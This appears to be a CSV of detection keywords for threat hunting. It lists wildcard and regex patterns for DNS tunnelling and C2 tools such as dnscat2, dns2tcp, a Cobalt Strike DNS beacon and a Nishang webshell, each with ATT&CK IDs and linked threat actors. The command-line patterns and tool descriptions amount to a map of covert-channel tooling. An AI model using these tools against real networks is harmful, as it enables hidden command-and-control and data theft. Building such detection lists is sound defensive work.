"*'dns_stager_subhost'*",".{0,1000}\'dns_stager_subhost\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","41186"
"*DNS_TXT_Pwnage.ps1*",".{0,1000}DNS_TXT_Pwnage\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","41187"
"*DNS_TXT_Pwnage.ps1*",".{0,1000}DNS_TXT_Pwnage\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41188"
"*dns2tcp-*.zip*",".{0,1000}dns2tcp\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41189"
"*dns2tcp.exe*",".{0,1000}dns2tcp\.exe.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41190"
"*dns2tcp.hsc.fr*",".{0,1000}dns2tcp\.hsc\.fr.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41191"
"*dns2tcp.kali.org*",".{0,1000}dns2tcp\.kali\.org.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41192"
"*dns2tcp.pid*",".{0,1000}dns2tcp\.pid.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41193"
"*dns2tcpc -z *",".{0,1000}dns2tcpc\s\-z\s.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41194"
"*dns2tcpc.exe*",".{0,1000}dns2tcpc\.exe.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41195"
"*dns2tcpd --*",".{0,1000}dns2tcpd\s\-\-.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41196"
"*dns2tcpd -f *",".{0,1000}dns2tcpd\s\-f\s.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41197"
"*dns2tcp-master*",".{0,1000}dns2tcp\-master.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41198"
"*dnsadmin_serverlevelplugindll.*",".{0,1000}dnsadmin_serverlevelplugindll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41199"
"*DNSAES256Handler.*",".{0,1000}DNSAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","41200"
"*dns-beacon *",".{0,1000}dns\-beacon\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","41201"
"*dns-black-cat-main*",".{0,1000}dns\-black\-cat\-main.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","41202"
"*DNS-C2 #>*",".{0,1000}DNS\-C2\s\#\>.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","41203"
"*dnscan-master*",".{0,1000}dnscan\-master.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","41204"
"*dnscat -*",".{0,1000}dnscat\s\-.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41205"
"*dnscat --dns *",".{0,1000}dnscat\s\-\-dns\s.{0,1000}","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","EMBER BEAR","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41206"
"*dnscat tcpcat*",".{0,1000}dnscat\stcpcat.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41207"
"*dnscat*",".{0,1000}dnscat.{0,1000}","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","EMBER BEAR","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41208"
"*dns-cat.exe -*",".{0,1000}dns\-cat\.exe\s\-.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","41209"
"*dnscat2*.tar.bz2*",".{0,1000}dnscat2.{0,1000}\.tar\.bz2.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41210"
"*dnscat2-*.zip*",".{0,1000}dnscat2\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41211"
"*dnscat2.*",".{0,1000}dnscat2\..{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41212"
"*dnscat2.ps1*",".{0,1000}dnscat2\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","41213"
"*dnscat2/*",".{0,1000}dnscat2\/.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41214"
"*dnscat2-server*",".{0,1000}dnscat2\-server.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41215"
"*dnscat2-win32.exe*",".{0,1000}dnscat2\-win32\.exe.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41216"
"*dnschef --fakeip 127.0.0.1 -q*",".{0,1000}dnschef\s\-\-fakeip\s127\.0\.0\.1\s\-q.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41217"
"*dnschef.exe *",".{0,1000}dnschef\.exe\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41218"
"*dnschef.logger*",".{0,1000}dnschef\.logger.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41219"
"*dnschef.py *",".{0,1000}dnschef\.py\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41220"
"*dnschef.utils*",".{0,1000}dnschef\.utils.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41221"
"*dnschef-ng-main*",".{0,1000}dnschef\-ng\-main.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41222"
"*DNSCrypt client proxy*",".{0,1000}DNSCrypt\sclient\sproxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41225"
"*DNSCrypt/dnscrypt-proxy*",".{0,1000}DNSCrypt\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41226"
"*dnscrypt-autoinstall*",".{0,1000}dnscrypt\-autoinstall.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41227"
"*dnscrypt-proxy -resolve*",".{0,1000}dnscrypt\-proxy\s\-resolve.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41228"
"*dnscrypt-proxy -service*",".{0,1000}dnscrypt\-proxy\s\-service.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41229"
"*dnscryptproxy.exe*",".{0,1000}dnscryptproxy\.exe.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41230"
"*dnscrypt-proxy.exe*",".{0,1000}dnscrypt\-proxy\.exe.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41231"
"*dnscrypt-proxy.socket*",".{0,1000}dnscrypt\-proxy\.socket.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41232"
"*dnscrypt-proxy.toml*",".{0,1000}dnscrypt\-proxy\.toml.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41233"
"*dnscrypt-proxy-android_arm-*.zip*",".{0,1000}dnscrypt\-proxy\-android_arm\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41234"
"*dnscrypt-proxy-android_arm64-*.zip*",".{0,1000}dnscrypt\-proxy\-android_arm64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41235"
"*dnscrypt-proxy-android_i386-*.zip*",".{0,1000}dnscrypt\-proxy\-android_i386\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41236"
"*dnscrypt-proxy-android_x86_64-*.zip*",".{0,1000}dnscrypt\-proxy\-android_x86_64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41237"
"*dnscrypt-proxy-dragonflybsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-dragonflybsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41238"
"*dnscrypt-proxy-freebsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41239"
"*dnscrypt-proxy-freebsd_arm-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_arm\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41240"
